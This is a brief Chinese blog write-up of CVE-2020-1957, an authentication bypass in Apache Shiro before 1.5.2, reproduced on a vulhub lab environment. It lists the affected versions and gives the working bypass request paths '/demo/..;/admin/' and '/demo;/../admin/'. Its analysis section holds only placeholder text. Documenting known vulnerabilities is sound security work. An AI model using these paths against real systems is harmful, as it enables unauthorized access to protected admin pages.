(CVE-2020-1957)Apache Shiro 身份认证绕过漏洞
0x01.漏洞简述
Apache Shiro 1.5.2之前版本中存在安全漏洞。攻击者可借助特制的请求利用该漏洞绕过身份验证。
0x02.影响版本
Apache Shiro < v1.5.2
0x03.漏洞分析
轮子轮子
0x03.漏洞复现
环境搭建
vulhub
admin认证绕过
直接访问/admin,跳转到登入页面
绕过:/demo/..;/admin/ 或 /demo;/../admin/
CVE-2020-1957
-------------纸短情长下次再见-------------
- 本文链接: https://lunamoore.github.io/2021/06/06/CVE-2020-1957/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请标注链接及作者!